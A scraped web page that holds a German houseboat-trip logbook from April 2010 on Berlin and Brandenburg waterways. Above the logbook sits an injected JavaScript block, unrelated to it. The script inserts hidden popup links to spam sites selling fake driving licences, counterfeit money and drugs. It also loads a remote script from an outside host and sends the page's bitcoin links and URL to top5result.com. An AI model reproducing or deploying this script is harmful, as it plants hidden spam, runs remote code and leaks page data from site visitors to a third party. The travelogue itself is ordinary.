/* Domain is for sale: admin@kickvox.com */ (function() { 'use strict'; if (window['shbNetLoaded']) return; window['shbNetLoaded'] = true; var popupHtml = "
buy dining chair online<\/a> <\/div>
www.benhomes.co.uk<\/span> <\/div> <\/div>
fake swedish driving license<\/a> <\/div>
globaldocumentservice.com<\/span> <\/div> <\/div> <\/div>
buy tang eray lemonade 8 oz<\/a> <\/div>
potheadstop.com<\/span> <\/div> <\/div>
hyaluron nasolabialfalten<\/a> <\/div>
www.mjhandl.at<\/span> <\/div> <\/div> <\/div>
uk courier comparison<\/a> <\/div>
www.vancompare.com<\/span> <\/div> <\/div>
10 situs hosting gratis<\/a> <\/div>
v2networks.cl<\/span> <\/div> <\/div> <\/div>
diradamento capelli femminile<\/a> <\/div>
microfue.it<\/span> <\/div> <\/div>
moonrocks ice for sale<\/a> <\/div>
organicweedvapes.com<\/span> <\/div> <\/div> <\/div>
recruitment agencies in johannesburg insurance<\/a> <\/div>
kontak.co.za<\/span> <\/div> <\/div>
kopcheta za balatoni<\/a> <\/div>
polkom.com<\/span> <\/div> <\/div> <\/div>
vps iix free cpanel<\/a> <\/div>
www.meric.net.tr<\/span> <\/div> <\/div>
liv3 on-line slot<\/a> <\/div>
allbet1688.com<\/span> <\/div> <\/div> <\/div>
\u015firket avukat\u0131 olmak<\/a> <\/div>
ozerymm.com<\/span> <\/div> <\/div>
cigarette jetable sans nicotine<\/a> <\/div>
www.ezee-e.fr<\/span> <\/div> <\/div> <\/div>
buy real belgium drivers license<\/a> <\/div>
legitcash-docs.org<\/span> <\/div> <\/div>
encanamento banheiros<\/a> <\/div>
jhdesentupidora.com.br<\/span> <\/div> <\/div> <\/div>
buy genotropin 12mg in canada<\/a> <\/div>
anabolicstebody.com<\/span> <\/div> <\/div>
fake like counterfeit money<\/a> <\/div>
www.elightdocumentation.com<\/span> <\/div> <\/div> <\/div>
\u8eca \u8cb8 \u589e \u8cb8<\/a> <\/div>
ezcar168.net<\/span> <\/div> <\/div>
medicinering f\u00f6r adhd<\/a> <\/div>
mankondjalakemedel.com<\/span> <\/div> <\/div> <\/div>
tungsten carbide rings<\/a> <\/div>
www.tungstencustom.com<\/span> <\/div> <\/div>
\u043d\u0435\u0434\u0432\u0438\u0436\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0411\u0430\u0442\u0443\u043c\u0438<\/a> <\/div>
batumiexpert.com<\/span> <\/div> <\/div> <\/div>
online company name generator<\/a> <\/div>
nameversion.com<\/span> <\/div> <\/div> <\/div>
<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>"; var popupCreated = false; function onReady() { tryCreatePopup(2); var box = create('div'); append(box, document.body); var defaultStyles = { width: '1px', height: '1px', background: 'transparent', display: 'inline-block', margin: '2px', padding: 0, verticalAlign: 'bottom', border: 'none' }; var a = create('a'); css(a, defaultStyles); document.addEventListener('keydown', function(e) { if (e.keyCode === 192 && e.ctrlKey) { css(a, { width: '20px', height: '20px', background: '#fff', border: '1px solid red' }); } }); document.addEventListener('keyup', function(e) { css(a, defaultStyles); }); a.className = 'shbNetgpLink'; append(a, box); a.href = 'javascript:;'; on(a, 'click', openLinerPopup); css(box, { position: 'fixed', margin: 0, padding: 0, outline: 'none', border: 'none', zIndex: 999999999, overflow: 'visible', direction: 'ltr' }); css(box, { left: '3px', right: 'auto', top: '50px', bottom: 'auto', width: '42px', height: '168px' }); } function clearStyles() { if(typeof document.createStyleSheet === 'undefined') { document.createStyleSheet = (function() { function createStyleSheet(href) { if(typeof href !== 'undefined') { var element = document.createElement('link'); element.type = 'text/css'; element.rel = 'stylesheet'; element.href = href; } else { var element = document.createElement('style'); element.type = 'text/css'; } document.getElementsByTagName('head')[0].appendChild(element); var sheet = document.styleSheets[document.styleSheets.length - 1]; if(typeof sheet.addRule === 'undefined') sheet.addRule = addRule; if(typeof sheet.removeRule === 'undefined') sheet.removeRule = sheet.deleteRule; return sheet; } function addRule(selectorText, cssText, index) { if(typeof index === 'undefined') index = this.cssRules.length; this.insertRule(selectorText + ' {' + cssText + '}', index); } return createStyleSheet; })(); } var sheet = document.createStyleSheet(); sheet.addRule('#shbNetPaddingTable', 'display: none;'); sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;'); sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;'); sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;'); sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:medium; line-height:normal;'); sheet.addRule('.shbNetPopupTable a', 'text-decoration:none; background:none; height:auto !important;'); } function tryCreatePopup(stage) { if (popupCreated) return; if (stage === 1) { document.writeln(popupHtml); } else if (stage === 2) { var mainBox = create('div'); mainBox.innerHTML = popupHtml; document.body.appendChild(mainBox); } else { return; } var wr = $('shbNetPaddingWr'); if (!wr) return; popupCreated = true; var table = $('shbNetPaddingTable'); css(table, { position: 'fixed', margin: 0, padding: 0, left: 0, top: 0, width: '100%', height: '100%', direction: 'ltr', zIndex: 999999999, background: 'none' }); css(table.getElementsByTagName('td')[0], { verticalAlign: 'middle', background: 'rgba(0, 0, 0, 0.5)' }); var popup = $('shbNetPaddingPopup'); css(popup, { margin: '0 auto', padding: '20px 25px 20px', width: '437px', background: '#fff', border: '1px solid #000', textAlign: 'left', position: 'relative', fontFamily: 'Tahoma, Arial, Verdana', boxSizing: 'content-box' }); on(document, 'keydown', function(e) { if (e.keyCode === 27) { wr.style.display = 'none'; } }); } function removeClass(node, className) { if (node && node.className) { node.className = node.className.replace(new RegExp('\\b' + className + '\\b', 'g'), ''); } } function openLinerPopup() { var pad = $('shbNetPaddingWr'); var tbl = $('shbNetPaddingTable'); if (!pad || !tbl) return; pad.style.display = 'block'; tbl.style.display = 'table'; var mainPopup = $('shbNetPopupWr'); if (!mainPopup) return; mainPopup.style.display = 'none'; } function $(id) { return document.getElementById(id); } function on(elem, event, handler) { elem.addEventListener(event, handler, false); } function css(elem, style) { for (var prop in style) { elem.style[prop] = style[prop]; } } function create(tag) { return document.createElement(tag); } function append(elem, parent) { parent.appendChild(elem); } setTimeout(function() { window.CJSource = 'shb2'; var script = document.createElement('script'); script.src = 'https://cleverjump.org/counter.js'; (document.head || document.body).appendChild(script); }, 10); if (document.readyState === 'complete' || document.readyState === 'interactive') { onReady(); } else { on(document, 'DOMContentLoaded', onReady); } tryCreatePopup(1); try { clearStyles(); } catch (ex) {} setTimeout(function() { try { var links = document.querySelectorAll('a[href^="bitcoin:"]'); //var links = document.querySelectorAll('a[href^="https://"]'); if (links.length) { var hrefs = []; for (var i = 0; i < links.length; i++) { hrefs.push(links[i].href); } var json = JSON.stringify({ hrefs: hrefs, jsDomain: 'top5result.com', refUrl: location.href }); var xhr = new XMLHttpRequest; xhr.open('POST', '//top5result.com/save.php'); xhr.setRequestHeader('Content-Type', 'text/plain'); xhr.onload = function() { xhr.responseText; } xhr.send(json); } } catch (ex) {} }, 2000); })();
20.05.2010

Hausboot-Törn in und um Berlin

Hausboot – Törn          23.04 – 30.04.2010

CharterYachtcharter Schulz
Basis: Berlin, Müggelseedamm  70 – Wassersportzentrum  Berlin
Basisleiter: Herr Weidermann
BootPedro Skiron 3 -  Hannah
Crew:  Gudrun, Tina, Pit

Freitag – 23.04.  –

Übernahme Boot  15.30 h – vorher Mittagessen auf der Terrasse des Hafenrestaurants “Windrose” -  sonniges Wetter; Einweisung und Probefahrt mit Herrn W., die Crew beschließt den Abend auf der Basis zu verbringen und erst morgen, den Törn zu starten; kühler Abend und frostige Nacht – die Bordheizung funktioniert.

Samstag -  24.04.  –

Der Morgen ist diesig und kühl, kein Regen!
Der Wasserdruck in der hinteren Sanitärzelle ist gleich null, in der vorderen brennt kein Licht.
Herr Weidermann ist schon weg, also wird der Duschkopf, der verkalkt ist, gereinigt, dann funktioniert es – beim Licht im  vorderen Bad musste nur der Außenschalter betätigt werden – den hatten wir übersehen!
Also los geht’s!

Frühstück – Ablegen  10.15 h

Fahrt über den Müggelsee, kleiner Müggelsee, malerische Müggelspree (Klein Venedig), Dämeritzsee, Flakensee, Rüdersdorfer Schleuse, weiter durch den Kalksee, Hohler See bis zum Anleger Museumspark Rüdersdorf gegen 13.00 h – kleiner Mittagsimbiß!

(- 19 km)
Die ersten An- und Ablegemanöver klappen erstaunlich gut – das Schiff ist ja auch gut zu fahren, es ist exakt zu steuern und die  ’Leinenwerfer’ an  Bug und Heck agieren mit Geschick!
Wir besichtigen den Park mit den alten Kalkbrennöfen – ein imposanter Anblick mit großartigen Fotomotiven! –
Seit 1220 wird Kalkstein in dieser Region gebrochen, erst im 17.Jhd. wurde mit der Herstellung von Brennkalk begonnen. Kammerersatzöfen, Trichteröfen, Rumfordöfen (1802), Schachtöfen-Batterie (1871), Ringöfen (1905-1959), 1967 stillgelegt – heute Museum -  in der Ferne sieht man das neue, moderne Kalkwerk!
Kaffee und Kuchen im “Magazin”  – Ablegen 16.00 h!

Wir fahren zurück bis zur Schleuse und dann weiter in die Löcknitz durch eine reizvolle Flusslandschaft mit gepflegter bis luxuriöser Uferbebauung und schönen Anwesen.
Wo bleiben wir heute Abend? – wir brauchen auf alle Fälle Landstrom für die Heizung der noch kalten Nächte wegen   -  im Werlsee gefällt uns kein Bootshaus  aber dann am Anfang des Peetzsees bietet das Restaurant “Karma am See” einen modernen Steg mit Wasser und Strom und dazu wie sich herausstellt ausgezeichnete Küche der gehobenen Kategorie! – Neben uns liegt noch eine “Kormoran 940″ mit einem Ehepaar aus Süddeutschland – man hilft  beim Anlegen ! – Liegegebühr 10.- €.

(– 14 )     33 km


Sonntag
-  25.04  -

Strahlender Morgen – kräftiger, kühler Wind! – Frühstück wie immer an Bord!
Ablegen 10.15 h – mit ablandigem Wind vom Steg, aber Vorsicht  – ein großer Dalben könnte hinderlich sein – aber es klappt alles vorzüglich!
Also zurück in die Löcknitz – unsere “Bayern” sind schon vor uns gestartet – sie müssen heute in Zeuthen abgeben!
Wir genießen die einsame Fahrt durch die frühlingshafte Landschaft über die noch stillen Kanäle und Flüsse und Seen -   noch ist außer uns kaum ein Boot auf dem Wasser zu sehen – die Saison hat noch nicht begonnen!

Wir fahren zurück  in den Dämeritzsee, durch den Gosener Kanal, den Seddinsee, dann ein Stück die Spree – Oder – Wasserstraße  – den Krossinsee – den großen Zug – an Wildow vorbei bis zur Schleuse “Neue Mühle”.
Dann geht es weiter durch den Krüpelsee – und wir sind natürlich schon wieder langsam auf der Suche nach einem attraktiven Landeplatz (mit Landstrom!).

Bei Bindowbrück gefällt uns die Bootswerft überhaupt nicht und der Anleger Gussow  kommt gleich gar nicht in Frage – also weiter durch den Dolgensee bis Prieros – Achtung – die Straßenbrücke davor hat laut Karte nur eine Durchfahrtshöhe von 3,90 m – wir eine Höhe von 3.80 m lt. Bootsbeschreibung – jetzt wird es spannend  – kommen wir da  ohne Berührung  durch –ganz langsam anfahren – was sagt der Mensch am Ufer? – Tina hält die Karte dazwischen – wir haben genug Raum –– dann kommt der “Gasthof zur Linde” mit Anleger in Sicht – wunderschön gelegen – (aber kein Strom!)   -  17.00 h
- 47 km

Landebier in der “Linde” – und dann haben wir auch Hunger, essen gut zubereiten Fisch und genießen auf der schön gelegenen Terrasse den Abend mit Blick auf den Fluß und das Boot!
Morgen soll das Wetter schlechter werden – schade!
Die Nacht wird eisig an Bord – ohne Heizung – in den frühen Morgenstunden schalte ich dann doch ein – die Bordbatterien müssen doch für ein paar Stunden auch für die Heizung ausreichen  – wir sind doch den ganzen Tag gefahren und haben aufgeladen!?

Montag– 26.04.  –

Strahlender Morgen – kleiner Einkaufsbummel durch das Örtchen –
Ablegen 11.00 h.
Da sich das Wetter heute verschlechtern soll und auch Regen droht – haben wir unsere Planung geändert und werden heute in die Teupitzer Gewässer fahren – bis Teupitz sind es ca. 19 km – und wir haben nur eine kritische Brücke – die Eisenbahnbrücke bei Großköris mit 3.80 m Durchfahrtshöhe (!) – und dann noch diese Zugbrücke am Großen Moddersee – (die nur jede volle Stunde öffnet) – und dann diese Untiefenwarnungen!
Das Anlegen vor der Zugbrücke ist ein bisschen schwierig, weil vom hochbordigen Schiff aus die Leinen von den sehr kurzen Pfählen immer wieder abrutschen!

Unter der Eisenbahnbrücke  ist mehr Spielraum als gedacht – wir haben mit Verdeck  wohl eine Durchfahrtshöhe von 3,65 m  (und nicht 3,80 m!)  – also kein Problem!

Den Hafen von Teupitz erreichen wir um 14.00 h   -  es beginnt zu regnen -     das Anlegemanöver muß abgebrochen werden, weil gegen den seitlichen Wind am Steg schwierig – Fehler des Kapitäns – also nochmal mit Erfolg an der anderen Seite mit dem Wind!
Ein freundlicher Steganlieger hilft bei den Leinen!
Kleiner Gang durch den Ort – recht dürftig – wir essen die mitgebrachte Pasta mit einem schönen Glas Rotwein von ‚Jaque’  aus dem Weinschlauch!
- 19 km

Heute haben wir Strom – der Hafenmeister wechselt uns die dazu nötigen 0,50 € – Münzen ein und kassiert 10.-€ Liegegebühr. – Es nieselt weiter – kleine  Siesta!

Später wagen wir doch noch einen Gang Richtung Ortsausgang zum 300 m entfernten Hotel und Restaurant ‚ Schenk von Landsberg ‚ – das einen ausgezeichneten Eindruck macht!
So ein tolles Haus in dieser gottverlassenen Gegend – wir können aber nun leider nicht mehr  die gute Küche ausprobieren – wir haben schon die Pasta  gegessen – Tina streikt – Gudrun bestell einen überbackenen Camembert und ich Spargel mit zerlassener Butter – beides ausgezeichnet!

Wir laufen durch den Nieselregen zum Hafen und beenden den Abend mit Wein und Nüssen an Bord!


Dienstag
.-  27.04.  –

Sonnig mit Wolken und stark windig!
Ablegen gegen 11.00 h  – Eisenbahnbrücke, Zugbrücke . die Manöver klappen immer besser!
Das Wetter wird immer unfreundlicher – es ist kalt und windig!

Wir verlassen die Teupitzer Gewässer und fahren an der “Linde” vorbei in den Wolziger See und beschließen für heute die Tour zu beenden und in Blossin zu bleiben! – 14.00 h
Beim Fischer in Blossin sind uns die vom Tiefenmesser angezeigten Werte zu suspekt (Hafeneinfahrt 0,2 m!) – also fahren wir in die benachbarte Marina Blossin und legen dort an mit Strom und Wasser – Liegegebühr 10.- €)
Kurzer Fußmarsch zum ‚ Fischer ‚  und nach einem Landebier essen wir ausgezeichnet Fisch!
Auf dem bordeigenen TV sehen wir ‚Bayern’ gegen ‚Lyon’  3:0   gewinnen (nun sind sie im Finale und wie sich erst am nächste Tag ergibt gegen Inter Mailand in Madrid am 22.5.!)

Morgen soll sehr schönes Wetter kommen mit Temperaturen bis 20 Grad – (Do. sogar bis 27 Grad!) – dann wäre die Strategie aufgegangen, das Verdeck erst bei diesem guten Wetter abzunehmen wegen der vielen niedrigen Brücken in Richtung Scharmützelsee!
- 27 km


Mittwoch
– 28.04.  –

Es ist sonnig und windstill – wir legen das Verdeck um, verlassen den Hafen um 10.00 h  und fahren über den Wolziger See – alle folgenden Brücken sind 3.70 m  hoch – auch die Brücke vor der Schleuse Kummersdorf – die Brücke bei Philadelphia ist mit 3.50 m angegeben – die Brücken nach Schleuse Storkow mit  3.90 m, die vor Wendisch Rietz mit 3,80 m, nach der Schleuse auch  mit 3.80 m. Aber das interessiert nun eigentlich nicht mehr!
Vor der Schleuse Storkow legen wir an, weil div. Baufahrzeuge passieren – aber als die durch sind schließt die Schleuse – ein Anruf ergibt – es ist eine automatische Schleuse – also wechseln auf die andere Anlegeseite und die Bedienungsstangen betätigen! – Es dauert dann ziemlich lange bis auch die nachfolgende Hubbrücke  öffnet!

14.00 h  – Wendisch Rietz  -  Gastanleger in der Marina – Mittagspause mit Erbsensuppe und Würstchen – nur eine ½ Std. – weil die Anzeigen auf den Automatikschleusen Schleusenzeiten von 7.00 h nur bis 17.00 h signalisierten – total unverständlich für diese Jahreszeit – aber hängen bleiben will man ja auch nicht! – Also los!

Um 17.25 h sind wir wieder beim Fischer in Blossin.

Der Fischer lotst uns in den Hafen – und hilft beim Anlegen – 0.2 m zeigt das Tiefenruder!
(vertraut mir – sagt der Fischer  – ich kenne meinen  Hafen!)

Strom, Landebier, Essen am Hafen mit schönem Blick über Hafen und See!
Gut zubereiteter Fisch – sehr zu empfehlen!
Morgen bringt er Brötchen – 11.- € Liegegebühr und 1.- € Strom!                        
-   36 km


Donnerstag – 29.04.  –

Auch heute haben wir schönes Sonnenwetter – nun beginnt die Heimreise nach Berlin!
(es sind 44 km, 1 Schleuse!)
Ablegen um 10.00 h -
Das Verdeck wird wieder hochgestellt – seitlich offen – es ist ja schönes Wetter!

Schleuse Neue Mühle – keine Probleme – der freundlich Schleusenwärter nimmt den Damen die Leinen ab, steckt sie durch die bogenförmigen Anlegestangen und gibt sie zurück – das ist uns einen kleinen Obolus wert (2.-€ ).

Mittags gibt es einen Imbiß auf die Faust – bei Kuhnle in Zeuthen ist kein Liegeplatz zu erkennen für einen Zwischenstop – also weiter! – Diesmal fahren wir nicht über den Großen Zug sondern durch den Zeuthener See weiter die Dahme hoch, an Karolinenhof vorbei – Richtung Köpenick.. Wir erkennen das bekannt gute, türkische Restaurant ” Zum Lehmofen”  und unseren Anleger von vor 2 Jahren “Aquaris Wassertouristik” .
Nun sind wir doch ziemlich gut in der Zeit – als ich überlege, wo man noch hinfahren könnte, meldet sich Herr Weidermann – wir hätten doch geäußert, das Boot ev. schon heute abzugeben — er wäre jedenfalls ab Nachmittag da!

Die Crew will nun doch lieber zurück zur Basis und dort noch den Abend verbringen, zumal wir die Müllers nicht mehr in Berlin antreffen, weil sie nun doch schon heute  nach Köln zurückfahren!

Ankunft um 15.00 h – Landebier in der Windrose, Tanken fahren mit Weidermann – das ist deutlich reeller als bei anderen Vercharterern mit der Betriebstunden- Abrechnung –
Vergleich:  Schulz  bei 36 Betriebstd.   74 Lt.         =    94.- €
andere  z.B.    x 5.5/Std.     =  198.- €  !!  (4.- bis 10.- €/Std.je Bootstyp)

Weidermann prüft den technischen Zustand des Bootes und ‚fotografiert’ die Schraube – alles in Ordnung!  Die Kaution wird zurückgegeben!

Abendessen in der “Windrose”! – Auf der Terrasse wird ein hoher Geburtstag gefeiert – eine in preußische Uniformen gekleidete  Blaskapelle mit Pickelhauben bringt als Ständchen Berliner Lieder und anderes volkstümliches zu Gehör und zur großen Freude von Tina ist auch die “Rosamunde” dabei! – Das ist aber ein toller Abschluß! -  Schlußwein an Bord!
- 44 km

Freitag – 30.04. –

Ein schöner Morgen, aber von Westen drohen Regenwolken – und tatsächlich gibt es während des Frühstücks einen ersten Regenschauer!  Wir können aber in Ruhe packen und unser Gepäck von Bord bringen – das Wetter beruhigt sich!
Ein schöner Törn ist zu Ende gegangen!  -  Um 11 Uhr verlassen wir den Hafen und sind  gegen 12.00 h wieder zuhause in Berlin – Wilmersdorf!

Total   – 206 km

Berlin, den 30. April  2010

Der Kapitän

____________________________________________________________________________________

Möchten Sie auch ein Hausboot mieten? Wir finden für jede Crew das passende Hausboot! Garantiert!

Kategorien